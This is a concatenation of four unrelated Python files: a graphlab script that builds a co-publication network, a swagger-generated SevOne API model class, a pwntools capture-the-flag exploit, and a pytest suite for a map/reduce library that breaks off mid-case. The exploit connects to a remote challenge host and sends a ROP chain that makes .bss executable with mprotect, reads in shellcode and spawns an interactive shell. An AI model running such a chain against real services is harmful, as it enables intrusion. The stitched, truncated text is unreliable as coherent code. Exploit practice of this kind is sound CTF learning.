# Build a co-publication link network: two publications are linked when
# they share an author; the link weight counts how many authors they share.
authors = graphlab.SFrame('./170331_PURE_Data_Challenge/PURE Data Challenge/authors.csv')
# One row per author, holding the list of that author's publication ids.
pub_authors = authors.groupby(key_columns='PERSON_ID', operations={'publications': agg.CONCAT('PUBLICATION_ID')})
solo_count = 0   # authors with a single publication (cannot form a link)
links = dict()   # (pub_a, pub_b) -> number of shared authors
for ci, pub in enumerate(pub_authors):
    if len(pub['publications']) == 1:
        solo_count += 1
    else:
        # Every pair of this author's publications forms (or reinforces) a link.
        for pair in itertools.combinations(pub['publications'], 2):
            # dict.get replaces the original O(n) `pair not in links.keys()` idiom.
            links[pair] = links.get(pair, 0) + 1
    if ci % 100 == 0:
        print(ci)  # progress indicator
# print() with a single argument behaves identically under Python 2 and 3,
# unlike the original print statements.
print("Established %d links in the publication network." % len(links))
print("%d authors publish only a single paper." % solo_count)
# Context manager guarantees the pickle file is closed even on error.
with open('publication_net_links_dict.pkl', 'wb') as f:
    pickle.dump(links, f)
|
# coding: utf-8
"""
SevOne API Documentation
Supported endpoints by the new RESTful API # noqa: E501
OpenAPI spec version: 2.1.18, Hash: db562e6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class IndicatorRequestDto(object):
    """NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Python attribute name -> declared swagger type (used by to_dict()).
    swagger_types = {
        'id': 'int',
        'evaluation_order': 'int',
        'format': 'str',
        'is_baselining': 'bool',
        'last_invalidation_time': 'int',
        'max_value': 'float',
        'plugin_indicator_type_id': 'int',
        'synthetic_expression': 'str',
        'system_max_value': 'float',
        'extended_info': 'dict(str, str)',
        'is_deleted': 'bool',
        'is_enabled': 'bool'
    }

    # Python attribute name -> JSON field name in the API definition.
    attribute_map = {
        'id': 'id',
        'evaluation_order': 'evaluationOrder',
        'format': 'format',
        'is_baselining': 'isBaselining',
        'last_invalidation_time': 'lastInvalidationTime',
        'max_value': 'maxValue',
        'plugin_indicator_type_id': 'pluginIndicatorTypeId',
        'synthetic_expression': 'syntheticExpression',
        'system_max_value': 'systemMaxValue',
        'extended_info': 'extendedInfo',
        'is_deleted': 'isDeleted',
        'is_enabled': 'isEnabled'
    }

    def __init__(self, id=None, evaluation_order=None, format=None, is_baselining=None, last_invalidation_time=None, max_value=None, plugin_indicator_type_id=None, synthetic_expression=None, system_max_value=None, extended_info=None, is_deleted=None, is_enabled=None):  # noqa: E501
        """IndicatorRequestDto - a model defined in Swagger"""  # noqa: E501
        self._id = None
        self._evaluation_order = None
        self._format = None
        self._is_baselining = None
        self._last_invalidation_time = None
        self._max_value = None
        self._plugin_indicator_type_id = None
        self._synthetic_expression = None
        self._system_max_value = None
        self._extended_info = None
        self._is_deleted = None
        self._is_enabled = None
        self.discriminator = None
        # Assign through the property setters so validation (e.g. the
        # `format` enum check) runs for constructor arguments too.
        if id is not None:
            self.id = id
        if evaluation_order is not None:
            self.evaluation_order = evaluation_order
        if format is not None:
            self.format = format
        if is_baselining is not None:
            self.is_baselining = is_baselining
        if last_invalidation_time is not None:
            self.last_invalidation_time = last_invalidation_time
        if max_value is not None:
            self.max_value = max_value
        if plugin_indicator_type_id is not None:
            self.plugin_indicator_type_id = plugin_indicator_type_id
        if synthetic_expression is not None:
            self.synthetic_expression = synthetic_expression
        if system_max_value is not None:
            self.system_max_value = system_max_value
        if extended_info is not None:
            self.extended_info = extended_info
        if is_deleted is not None:
            self.is_deleted = is_deleted
        if is_enabled is not None:
            self.is_enabled = is_enabled

    @property
    def id(self):
        """Gets the id of this IndicatorRequestDto.  # noqa: E501

        :return: The id of this IndicatorRequestDto.  # noqa: E501
        :rtype: int
        """
        return self._id

    @id.setter
    def id(self, id):
        """Sets the id of this IndicatorRequestDto.

        :param id: The id of this IndicatorRequestDto.  # noqa: E501
        :type: int
        """
        self._id = id

    @property
    def evaluation_order(self):
        """Gets the evaluation_order of this IndicatorRequestDto.  # noqa: E501

        :return: The evaluation_order of this IndicatorRequestDto.  # noqa: E501
        :rtype: int
        """
        return self._evaluation_order

    @evaluation_order.setter
    def evaluation_order(self, evaluation_order):
        """Sets the evaluation_order of this IndicatorRequestDto.

        :param evaluation_order: The evaluation_order of this IndicatorRequestDto.  # noqa: E501
        :type: int
        """
        self._evaluation_order = evaluation_order

    @property
    def format(self):
        """Gets the format of this IndicatorRequestDto.  # noqa: E501

        :return: The format of this IndicatorRequestDto.  # noqa: E501
        :rtype: str
        """
        return self._format

    @format.setter
    def format(self, format):
        """Sets the format of this IndicatorRequestDto.

        :param format: The format of this IndicatorRequestDto.  # noqa: E501
        :type: str
        """
        # `format` is an enum in the API spec; reject anything else.
        allowed_values = ["GAUGE", "COUNTER32", "COUNTER64"]  # noqa: E501
        if format not in allowed_values:
            raise ValueError(
                "Invalid value for `format` ({0}), must be one of {1}"  # noqa: E501
                .format(format, allowed_values)
            )
        self._format = format

    @property
    def is_baselining(self):
        """Gets the is_baselining of this IndicatorRequestDto.  # noqa: E501

        :return: The is_baselining of this IndicatorRequestDto.  # noqa: E501
        :rtype: bool
        """
        return self._is_baselining

    @is_baselining.setter
    def is_baselining(self, is_baselining):
        """Sets the is_baselining of this IndicatorRequestDto.

        :param is_baselining: The is_baselining of this IndicatorRequestDto.  # noqa: E501
        :type: bool
        """
        self._is_baselining = is_baselining

    @property
    def last_invalidation_time(self):
        """Gets the last_invalidation_time of this IndicatorRequestDto.  # noqa: E501

        Unix timestamp with milliseconds proximity  # noqa: E501

        :return: The last_invalidation_time of this IndicatorRequestDto.  # noqa: E501
        :rtype: int
        """
        return self._last_invalidation_time

    @last_invalidation_time.setter
    def last_invalidation_time(self, last_invalidation_time):
        """Sets the last_invalidation_time of this IndicatorRequestDto.

        Unix timestamp with milliseconds proximity  # noqa: E501

        :param last_invalidation_time: The last_invalidation_time of this IndicatorRequestDto.  # noqa: E501
        :type: int
        """
        self._last_invalidation_time = last_invalidation_time

    @property
    def max_value(self):
        """Gets the max_value of this IndicatorRequestDto.  # noqa: E501

        :return: The max_value of this IndicatorRequestDto.  # noqa: E501
        :rtype: float
        """
        return self._max_value

    @max_value.setter
    def max_value(self, max_value):
        """Sets the max_value of this IndicatorRequestDto.

        :param max_value: The max_value of this IndicatorRequestDto.  # noqa: E501
        :type: float
        """
        self._max_value = max_value

    @property
    def plugin_indicator_type_id(self):
        """Gets the plugin_indicator_type_id of this IndicatorRequestDto.  # noqa: E501

        :return: The plugin_indicator_type_id of this IndicatorRequestDto.  # noqa: E501
        :rtype: int
        """
        return self._plugin_indicator_type_id

    @plugin_indicator_type_id.setter
    def plugin_indicator_type_id(self, plugin_indicator_type_id):
        """Sets the plugin_indicator_type_id of this IndicatorRequestDto.

        :param plugin_indicator_type_id: The plugin_indicator_type_id of this IndicatorRequestDto.  # noqa: E501
        :type: int
        """
        self._plugin_indicator_type_id = plugin_indicator_type_id

    @property
    def synthetic_expression(self):
        """Gets the synthetic_expression of this IndicatorRequestDto.  # noqa: E501

        :return: The synthetic_expression of this IndicatorRequestDto.  # noqa: E501
        :rtype: str
        """
        return self._synthetic_expression

    @synthetic_expression.setter
    def synthetic_expression(self, synthetic_expression):
        """Sets the synthetic_expression of this IndicatorRequestDto.

        :param synthetic_expression: The synthetic_expression of this IndicatorRequestDto.  # noqa: E501
        :type: str
        """
        self._synthetic_expression = synthetic_expression

    @property
    def system_max_value(self):
        """Gets the system_max_value of this IndicatorRequestDto.  # noqa: E501

        :return: The system_max_value of this IndicatorRequestDto.  # noqa: E501
        :rtype: float
        """
        return self._system_max_value

    @system_max_value.setter
    def system_max_value(self, system_max_value):
        """Sets the system_max_value of this IndicatorRequestDto.

        :param system_max_value: The system_max_value of this IndicatorRequestDto.  # noqa: E501
        :type: float
        """
        self._system_max_value = system_max_value

    @property
    def extended_info(self):
        """Gets the extended_info of this IndicatorRequestDto.  # noqa: E501

        :return: The extended_info of this IndicatorRequestDto.  # noqa: E501
        :rtype: dict(str, str)
        """
        return self._extended_info

    @extended_info.setter
    def extended_info(self, extended_info):
        """Sets the extended_info of this IndicatorRequestDto.

        :param extended_info: The extended_info of this IndicatorRequestDto.  # noqa: E501
        :type: dict(str, str)
        """
        self._extended_info = extended_info

    @property
    def is_deleted(self):
        """Gets the is_deleted of this IndicatorRequestDto.  # noqa: E501

        false  # noqa: E501

        :return: The is_deleted of this IndicatorRequestDto.  # noqa: E501
        :rtype: bool
        """
        return self._is_deleted

    @is_deleted.setter
    def is_deleted(self, is_deleted):
        """Sets the is_deleted of this IndicatorRequestDto.

        false  # noqa: E501

        :param is_deleted: The is_deleted of this IndicatorRequestDto.  # noqa: E501
        :type: bool
        """
        self._is_deleted = is_deleted

    @property
    def is_enabled(self):
        """Gets the is_enabled of this IndicatorRequestDto.  # noqa: E501

        :return: The is_enabled of this IndicatorRequestDto.  # noqa: E501
        :rtype: bool
        """
        return self._is_enabled

    @is_enabled.setter
    def is_enabled(self, is_enabled):
        """Sets the is_enabled of this IndicatorRequestDto.

        :param is_enabled: The is_enabled of this IndicatorRequestDto.  # noqa: E501
        :type: bool
        """
        self._is_enabled = is_enabled

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Recursively convert nested models, lists and dicts of models.
        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        # Generated boilerplate: only relevant if the model subclasses dict.
        if issubclass(IndicatorRequestDto, dict):
            for key, value in self.items():
                result[key] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, IndicatorRequestDto):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
from pwn import *
# ROP gadget / memory addresses in the target binary.
pop_3_ret_addr = 0x0809e3e5  # pops 3 stack slots, then ret (clears mprotect args)
pop_2_ret_addr = 0x0809a6fc  # pops 2 slots, then ret (unused here)
pop_1_ret_addr = 0x080481ad  # pops 1 slot, then ret (clears gets arg)
bss_addr = 0x080EC000        # writable .bss page — shellcode destination
bss_len = 0x2000             # length passed to mprotect
#p = process('./not_the_same_3dsctf_2016')
p = remote('node3.buuoj.cn', 28377)
elf = ELF('not_the_same_3dsctf_2016')
mprotect_addr = elf.symbols['mprotect']
# NOTE(review): despite the name, this value is used as mprotect's `prot`
# argument: 1|2|4 == 7, presumably PROT_READ|PROT_WRITE|PROT_EXEC — confirm.
port = 1 + 2 + 4
gets_addr = elf.symbols['gets']
shellcode = asm(shellcraft.sh(), os = 'linux', arch = 'i386')
# Chain: 0x2d bytes of padding to the saved return address, then
# mprotect(bss_addr, bss_len, 7) with pop3;ret cleaning its arguments,
# then gets(bss_addr) to read the shellcode into .bss (pop1;ret cleans
# the argument), and finally return into bss_addr to run it.
payload = b'a' * 0x2d + p32(mprotect_addr) + p32(pop_3_ret_addr) + p32(bss_addr) + p32(bss_len) + p32(port)
payload += p32(gets_addr) + p32(pop_1_ret_addr) + p32(bss_addr) + p32(bss_addr)
p.sendline(payload)
p.sendline(shellcode)
p.interactive()
|
import copy
import dataclasses
import pytest
import time
import typing as tp
from pytest import approx
from compgraph import operations as ops
from . import memory_watchdog
# Byte-size units (binary prefixes) used for memory limits in these tests.
KiB = 1024
MiB = 1024 * KiB
class _Key:
def __init__(self, *args: str) -> None:
self._items = sorted(args)
def __call__(self, d: tp.Mapping[str, tp.Any]) -> tp.Tuple[str, ...]:
return tuple(str(d.get(key)) for key in self._items)
@dataclasses.dataclass
class MapCase:
    """Table-driven fixture for Mapper/Map tests."""
    mapper: ops.Mapper                  # mapper under test
    data: tp.List[ops.TRow]             # full input table
    etalon: tp.List[ops.TRow]           # expected output for the full table
    cmp_keys: tp.Tuple[str, ...]        # columns used to order rows for comparison
    mapper_item: int = 0                # index of the single row fed to the bare mapper
    mapper_etalon_items: tp.Tuple[int, ...] = (0,)  # etalon indices produced by that row
# Fixture table consumed by test_mapper: one MapCase per mapper behavior
# (identity, lowercasing, punctuation stripping, splitting, product,
# filtering, projection).
MAP_CASES = [
    MapCase(
        mapper=ops.DummyMapper(),
        data=[
            {'test_id': 1, 'text': 'one two three'},
            {'test_id': 2, 'text': 'testing out stuff'}
        ],
        etalon=[
            {'test_id': 1, 'text': 'one two three'},
            {'test_id': 2, 'text': 'testing out stuff'}
        ],
        cmp_keys=("test_id", "text")
    ),
    MapCase(
        mapper=ops.LowerCase(column='text'),
        data=[
            {'test_id': 1, 'text': 'camelCaseTest'},
            {'test_id': 2, 'text': 'UPPER_CASE_TEST'},
            {'test_id': 3, 'text': 'wEiRdTeSt'}
        ],
        etalon=[
            {'test_id': 1, 'text': 'camelcasetest'},
            {'test_id': 2, 'text': 'upper_case_test'},
            {'test_id': 3, 'text': 'weirdtest'}
        ],
        cmp_keys=("test_id", "text")
    ),
    MapCase(
        mapper=ops.FilterPunctuation(column='text'),
        data=[
            {'test_id': 1, 'text': 'Hello, world!'},
            {'test_id': 2, 'text': 'Test. with. a. lot. of. dots.'},
            {'test_id': 3, 'text': r'!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~'}
        ],
        etalon=[
            {'test_id': 1, 'text': 'Hello world'},
            {'test_id': 2, 'text': 'Test with a lot of dots'},
            {'test_id': 3, 'text': ''}
        ],
        cmp_keys=("test_id", "text")
    ),
    MapCase(
        mapper=ops.Split(column='text'),
        data=[
            {'test_id': 1, 'text': 'one two three'},
            {'test_id': 2, 'text': 'tab\tsplitting\ttest'},
            {'test_id': 3, 'text': 'more\nlines\ntest'},
            {'test_id': 4, 'text': 'tricky\u00A0test'}
        ],
        etalon=[
            {'test_id': 1, 'text': 'one'},
            {'test_id': 1, 'text': 'three'},
            {'test_id': 1, 'text': 'two'},
            {'test_id': 2, 'text': 'splitting'},
            {'test_id': 2, 'text': 'tab'},
            {'test_id': 2, 'text': 'test'},
            {'test_id': 3, 'text': 'lines'},
            {'test_id': 3, 'text': 'more'},
            {'test_id': 3, 'text': 'test'},
            {'test_id': 4, 'text': 'test'},
            {'test_id': 4, 'text': 'tricky'}
        ],
        cmp_keys=("test_id", "text"),
        mapper_etalon_items=(0, 1, 2)
    ),
    MapCase(
        mapper=ops.Product(columns=['speed', 'distance'], result_column='time'),
        data=[
            {'test_id': 1, 'speed': 5, 'distance': 10},
            {'test_id': 2, 'speed': 60, 'distance': 2},
            {'test_id': 3, 'speed': 3, 'distance': 15},
            {'test_id': 4, 'speed': 100, 'distance': 0.5},
            {'test_id': 5, 'speed': 48, 'distance': 15},
        ],
        etalon=[
            {'test_id': 1, 'speed': 5, 'distance': 10, 'time': 50},
            {'test_id': 2, 'speed': 60, 'distance': 2, 'time': 120},
            {'test_id': 3, 'speed': 3, 'distance': 15, 'time': 45},
            {'test_id': 4, 'speed': 100, 'distance': 0.5, 'time': 50},
            {'test_id': 5, 'speed': 48, 'distance': 15, 'time': 720},
        ],
        cmp_keys=("test_id", "speed", "distance", "time")
    ),
    MapCase(
        # XOR: keep rows where exactly one of f/g is truthy.
        mapper=ops.Filter(condition=lambda row: row['f'] ^ row['g']),
        data=[
            {'test_id': 1, 'f': 0, 'g': 0},
            {'test_id': 2, 'f': 0, 'g': 1},
            {'test_id': 3, 'f': 1, 'g': 0},
            {'test_id': 4, 'f': 1, 'g': 1}
        ],
        etalon=[
            {'test_id': 2, 'f': 0, 'g': 1},
            {'test_id': 3, 'f': 1, 'g': 0}
        ],
        cmp_keys=("test_id", "f", "g"),
        # The single-row check feeds row 0, which the filter drops entirely.
        mapper_etalon_items=tuple()
    ),
    MapCase(
        mapper=ops.Project(columns=['value']),
        data=[
            {'test_id': 1, 'junk': 'x', 'value': 42},
            {'test_id': 2, 'junk': 'y', 'value': 1},
            {'test_id': 3, 'junk': 'z', 'value': 144}
        ],
        etalon=[
            {'value': 42},
            {'value': 1},
            {'value': 144}
        ],
        cmp_keys=("value",)
    )
]
@pytest.mark.parametrize("case", MAP_CASES)
def test_mapper(case: MapCase) -> None:
    """Check a mapper both row-wise and through the Map operation."""
    single_row = copy.deepcopy(case.data[case.mapper_item])
    expected_rows = [copy.deepcopy(case.etalon[i]) for i in case.mapper_etalon_items]
    sort_key = _Key(*case.cmp_keys)

    # The bare mapper must lazily yield the expected rows for one input row.
    row_result = case.mapper(single_row)
    assert isinstance(row_result, tp.Iterator)
    assert sorted(expected_rows, key=sort_key) == sorted(row_result, key=sort_key)

    # The Map operation must process the whole table the same way.
    full_result = ops.Map(case.mapper)(iter(case.data))
    assert isinstance(full_result, tp.Iterator)
    assert sorted(case.etalon, key=sort_key) == sorted(full_result, key=sort_key)
@dataclasses.dataclass
class ReduceCase:
    """Table-driven fixture for Reducer/Reduce tests."""
    reducer: ops.Reducer                # reducer under test
    reducer_keys: tp.Tuple[str, ...]    # grouping columns
    data: tp.List[ops.TRow]             # full input table (pre-grouped order)
    etalon: tp.List[ops.TRow]           # expected output for the full table
    cmp_keys: tp.Tuple[str, ...]        # columns used to order rows for comparison
    reduce_data_items: tp.Tuple[int, ...] = (0,)    # indices of one key group's rows
    reduce_etalon_items: tp.Tuple[int, ...] = (0,)  # etalon indices for that group
# Fixture table consumed by test_reducer: one ReduceCase per reducer
# behavior (first row, top-n, term frequency, count, sum).
REDUCE_CASES = [
    ReduceCase(
        reducer=ops.FirstReducer(),
        reducer_keys=('test_id',),
        data=[
            {'test_id': 1, 'text': 'hello, world'},
            {'test_id': 2, 'text': 'bye!'}
        ],
        etalon=[
            {'test_id': 1, 'text': 'hello, world'},
            {'test_id': 2, 'text': 'bye!'}
        ],
        cmp_keys=("test_id", "text")
    ),
    ReduceCase(
        reducer=ops.TopN(column='rank', n=3),
        reducer_keys=('match_id',),
        data=[
            {'match_id': 1, 'player_id': 1, 'rank': 42},
            {'match_id': 1, 'player_id': 2, 'rank': 7},
            {'match_id': 1, 'player_id': 3, 'rank': 0},
            {'match_id': 1, 'player_id': 4, 'rank': 39},
            {'match_id': 2, 'player_id': 5, 'rank': 15},
            {'match_id': 2, 'player_id': 6, 'rank': 39},
            {'match_id': 2, 'player_id': 7, 'rank': 27},
            {'match_id': 2, 'player_id': 8, 'rank': 7}
        ],
        etalon=[
            {'match_id': 1, 'player_id': 1, 'rank': 42},
            {'match_id': 1, 'player_id': 2, 'rank': 7},
            {'match_id': 1, 'player_id': 4, 'rank': 39},
            {'match_id': 2, 'player_id': 5, 'rank': 15},
            {'match_id': 2, 'player_id': 6, 'rank': 39},
            {'match_id': 2, 'player_id': 7, 'rank': 27}
        ],
        cmp_keys=("match_id", "player_id", "rank"),
        reduce_data_items=(0, 1, 2, 3),
        reduce_etalon_items=(0, 1, 2)
    ),
    ReduceCase(
        reducer=ops.TermFrequency(words_column='text'),
        reducer_keys=('doc_id',),
        data=[
            {'doc_id': 1, 'text': 'hello', 'count': 1},
            {'doc_id': 1, 'text': 'little', 'count': 1},
            {'doc_id': 1, 'text': 'world', 'count': 1},
            {'doc_id': 2, 'text': 'little', 'count': 1},
            {'doc_id': 3, 'text': 'little', 'count': 3},
            {'doc_id': 3, 'text': 'little', 'count': 3},
            {'doc_id': 3, 'text': 'little', 'count': 3},
            {'doc_id': 4, 'text': 'little', 'count': 2},
            {'doc_id': 4, 'text': 'hello', 'count': 1},
            {'doc_id': 4, 'text': 'little', 'count': 2},
            {'doc_id': 4, 'text': 'world', 'count': 1},
            {'doc_id': 5, 'text': 'hello', 'count': 2},
            {'doc_id': 5, 'text': 'hello', 'count': 2},
            {'doc_id': 5, 'text': 'world', 'count': 1},
            {'doc_id': 6, 'text': 'world', 'count': 4},
            {'doc_id': 6, 'text': 'world', 'count': 4},
            {'doc_id': 6, 'text': 'world', 'count': 4},
            {'doc_id': 6, 'text': 'world', 'count': 4},
            {'doc_id': 6, 'text': 'hello', 'count': 1}
        ],
        etalon=[
            {'doc_id': 1, 'text': 'hello', 'tf': approx(0.3333, abs=0.001)},
            {'doc_id': 1, 'text': 'little', 'tf': approx(0.3333, abs=0.001)},
            {'doc_id': 1, 'text': 'world', 'tf': approx(0.3333, abs=0.001)},
            {'doc_id': 2, 'text': 'little', 'tf': approx(1.0)},
            {'doc_id': 3, 'text': 'little', 'tf': approx(1.0)},
            {'doc_id': 4, 'text': 'hello', 'tf': approx(0.25)},
            {'doc_id': 4, 'text': 'little', 'tf': approx(0.5)},
            {'doc_id': 4, 'text': 'world', 'tf': approx(0.25)},
            {'doc_id': 5, 'text': 'hello', 'tf': approx(0.666, abs=0.001)},
            {'doc_id': 5, 'text': 'world', 'tf': approx(0.333, abs=0.001)},
            {'doc_id': 6, 'text': 'hello', 'tf': approx(0.2)},
            {'doc_id': 6, 'text': 'world', 'tf': approx(0.8)}
        ],
        cmp_keys=("doc_id", "text", "tf"),
        reduce_data_items=(0, 1, 2),
        reduce_etalon_items=(0, 1, 2)
    ),
    ReduceCase(
        reducer=ops.Count(column='count'),
        reducer_keys=("word",),
        data=[
            {'sentence_id': 2, 'word': 'hell'},
            {'sentence_id': 1, 'word': 'hello'},
            {'sentence_id': 2, 'word': 'hello'},
            {'sentence_id': 1, 'word': 'little'},
            {'sentence_id': 2, 'word': 'little'},
            {'sentence_id': 2, 'word': 'little'},
            {'sentence_id': 1, 'word': 'my'},
            {'sentence_id': 2, 'word': 'my'},
            {'sentence_id': 1, 'word': 'world'},
        ],
        etalon=[
            {'count': 1, 'word': 'hell'},
            {'count': 1, 'word': 'world'},
            {'count': 2, 'word': 'hello'},
            {'count': 2, 'word': 'my'},
            {'count': 3, 'word': 'little'}
        ],
        cmp_keys=("count", "word"),
        reduce_data_items=(1, 2),
        reduce_etalon_items=(2,)
    ),
    ReduceCase(
        reducer=ops.Sum(column='score'),
        reducer_keys=("match_id",),
        data=[
            {'match_id': 1, 'player_id': 1, 'score': 42},
            {'match_id': 1, 'player_id': 2, 'score': 7},
            {'match_id': 1, 'player_id': 3, 'score': 0},
            {'match_id': 1, 'player_id': 4, 'score': 39},
            {'match_id': 2, 'player_id': 5, 'score': 15},
            {'match_id': 2, 'player_id': 6, 'score': 39},
            {'match_id': 2, 'player_id': 7, 'score': 27},
            {'match_id': 2, 'player_id': 8, 'score': 7}
        ],
        etalon=[
            {'match_id': 1, 'score': 88},
            {'match_id': 2, 'score': 88}
        ],
        # BUGFIX: was ("test_id", "text"), copy-pasted from the first case.
        # Those columns do not exist here, so every sort key degenerated to
        # ('None', 'None') and the ordering check was vacuous. Use the
        # columns this case actually produces.
        cmp_keys=("match_id", "score"),
        reduce_data_items=(0, 1, 2, 3),
        reduce_etalon_items=(0,)
    )
]
@pytest.mark.parametrize("case", REDUCE_CASES)
def test_reducer(case: ReduceCase) -> None:
    """Check a reducer both on a single key group and through Reduce."""
    group_rows = [copy.deepcopy(case.data[i]) for i in case.reduce_data_items]
    group_etalon = [copy.deepcopy(case.etalon[i]) for i in case.reduce_etalon_items]
    sort_key = _Key(*case.cmp_keys)

    # The bare reducer must lazily reduce one key group to its etalon rows.
    group_result = case.reducer(case.reducer_keys, iter(group_rows))
    assert isinstance(group_result, tp.Iterator)
    assert sorted(group_etalon, key=sort_key) == sorted(group_result, key=sort_key)

    # The Reduce operation must process the whole table the same way.
    full_result = ops.Reduce(case.reducer, case.reducer_keys)(iter(case.data))
    assert isinstance(full_result, tp.Iterator)
    assert sorted(case.etalon, key=sort_key) == sorted(full_result, key=sort_key)
@dataclasses.dataclass
class JoinCase:
    """Table-driven fixture for Joiner/Join tests."""
    joiner: ops.Joiner                  # joiner under test
    join_keys: tp.Sequence[str]         # columns to join on
    data_left: tp.List[ops.TRow]        # left input table
    data_right: tp.List[ops.TRow]       # right input table
    etalon: tp.List[ops.TRow]           # expected joined rows
    cmp_keys: tp.Tuple[str, ...]        # columns used to order rows for comparison
    # Indices selecting a single key group for the direct joiner call.
    join_data_left_items: tp.Tuple[int, ...] = (0,)
    join_data_right_items: tp.Tuple[int, ...] = (0,)
    join_etalon_items: tp.Tuple[int, ...] = (0,)
# Join scenarios: inner-join happy path, unmatched rows on each side,
# outer/left/right semantics, and column-name collision suffixes.
JOIN_CASES = [
    # Inner join: one row per (left, right) pair sharing a player_id.
    JoinCase(
        joiner=ops.InnerJoiner(),
        join_keys=('player_id',),
        data_left=[
            {'player_id': 1, 'username': 'XeroX'},
            {'player_id': 2, 'username': 'jay'},
            {'player_id': 3, 'username': 'Destroyer'},
        ],
        data_right=[
            {'game_id': 2, 'player_id': 1, 'score': 17},
            {'game_id': 3, 'player_id': 1, 'score': 22},
            {'game_id': 1, 'player_id': 3, 'score': 99}
        ],
        etalon=[
            {'game_id': 1, 'player_id': 3, 'score': 99, 'username': 'Destroyer'},
            {'game_id': 2, 'player_id': 1, 'score': 17, 'username': 'XeroX'},
            {'game_id': 3, 'player_id': 1, 'score': 22, 'username': 'XeroX'}
        ],
        cmp_keys=("game_id", "player_id", "score", "username"),
        join_data_left_items=(0,),
        join_data_right_items=(0, 1),
        join_etalon_items=(1, 2)
    ),
    # Inner join drops rows with no partner on the other side.
    JoinCase(
        joiner=ops.InnerJoiner(),
        join_keys=('player_id',),
        data_left=[
            {'player_id': 0, 'username': 'root'},
            {'player_id': 1, 'username': 'XeroX'},
            {'player_id': 2, 'username': 'jay'}
        ],
        data_right=[
            {'game_id': 2, 'player_id': 1, 'score': 17},
            {'game_id': 3, 'player_id': 2, 'score': 22},
            {'game_id': 1, 'player_id': 3, 'score': 9999999}
        ],
        etalon=[
            # player 3 is unknown
            # no games for player 0
            {'game_id': 2, 'player_id': 1, 'score': 17, 'username': 'XeroX'},
            {'game_id': 3, 'player_id': 2, 'score': 22, 'username': 'jay'}
        ],
        cmp_keys=("game_id", "player_id", "score", "username"),
        join_data_left_items=(2,),
        join_data_right_items=(1,),
        join_etalon_items=(1,),
    ),
    # Outer join keeps unmatched rows from both sides (with missing columns).
    JoinCase(
        joiner=ops.OuterJoiner(),
        join_keys=('player_id',),
        data_left=[
            {'player_id': 0, 'username': 'root'},
            {'player_id': 1, 'username': 'XeroX'},
            {'player_id': 2, 'username': 'jay'}
        ],
        data_right=[
            {'game_id': 2, 'player_id': 1, 'score': 17},
            {'game_id': 3, 'player_id': 2, 'score': 22},
            {'game_id': 1, 'player_id': 3, 'score': 9999999}
        ],
        etalon=[
            {'player_id': 0, 'username': 'root'},  # no such game
            {'game_id': 1, 'player_id': 3, 'score': 9999999},  # no such player
            {'game_id': 2, 'player_id': 1, 'score': 17, 'username': 'XeroX'},
            {'game_id': 3, 'player_id': 2, 'score': 22, 'username': 'jay'}
        ],
        cmp_keys=("game_id", "player_id", "score", "username"),
        join_data_left_items=(0,),
        join_data_right_items=tuple(),
        join_etalon_items=(0,),
    ),
    # Left join keeps unmatched left rows, drops unmatched right rows.
    JoinCase(
        joiner=ops.LeftJoiner(),
        join_keys=('player_id',),
        data_left=[
            {'game_id': 2, 'player_id': 1, 'score': 17},
            {'game_id': 3, 'player_id': 2, 'score': 22},
            {'game_id': 4, 'player_id': 2, 'score': 41},
            {'game_id': 1, 'player_id': 3, 'score': 0}
        ],
        data_right=[
            {'player_id': 0, 'username': 'root'},
            {'player_id': 1, 'username': 'XeroX'},
            {'player_id': 2, 'username': 'jay'}
        ],
        etalon=[
            # ignore player 0 with 0 games
            {'game_id': 1, 'player_id': 3, 'score': 0},  # unknown player 3
            {'game_id': 2, 'player_id': 1, 'score': 17, 'username': 'XeroX'},
            {'game_id': 3, 'player_id': 2, 'score': 22, 'username': 'jay'},
            {'game_id': 4, 'player_id': 2, 'score': 41, 'username': 'jay'}
        ],
        cmp_keys=("game_id", "player_id", "score", "username"),
        join_data_left_items=(1, 2),
        join_data_right_items=(2,),
        join_etalon_items=(2, 3)
    ),
    # Right join keeps unmatched right rows, drops unmatched left rows.
    JoinCase(
        joiner=ops.RightJoiner(),
        join_keys=('player_id',),
        data_left=[
            {'game_id': 2, 'player_id': 1, 'score': 17},
            {'game_id': 5, 'player_id': 1, 'score': 34},
            {'game_id': 3, 'player_id': 2, 'score': 22},
            {'game_id': 4, 'player_id': 2, 'score': 41},
            {'game_id': 1, 'player_id': 3, 'score': 0}
        ],
        data_right=[
            {'player_id': 0, 'username': 'root'},
            {'player_id': 1, 'username': 'XeroX'},
            {'player_id': 2, 'username': 'jay'}
        ],
        etalon=[
            # ignore game with unknown player 3
            {'player_id': 0, 'username': 'root'},  # no games for root
            {'game_id': 2, 'player_id': 1, 'score': 17, 'username': 'XeroX'},
            {'game_id': 3, 'player_id': 2, 'score': 22, 'username': 'jay'},
            {'game_id': 4, 'player_id': 2, 'score': 41, 'username': 'jay'},
            {'game_id': 5, 'player_id': 1, 'score': 34, 'username': 'XeroX'}
        ],
        cmp_keys=("game_id", "player_id", "score", "username"),
        join_data_left_items=(2, 3),
        join_data_right_items=(2,),
        join_etalon_items=(2, 3)
    ),
    # Colliding non-key column 'score' gets per-side suffixes.
    JoinCase(
        joiner=ops.InnerJoiner(suffix_a='_game', suffix_b='_max'),
        join_keys=('player_id',),
        data_left=[
            {'game_id': 2, 'player_id': 1, 'score': 17},
            {'game_id': 3, 'player_id': 1, 'score': 22},
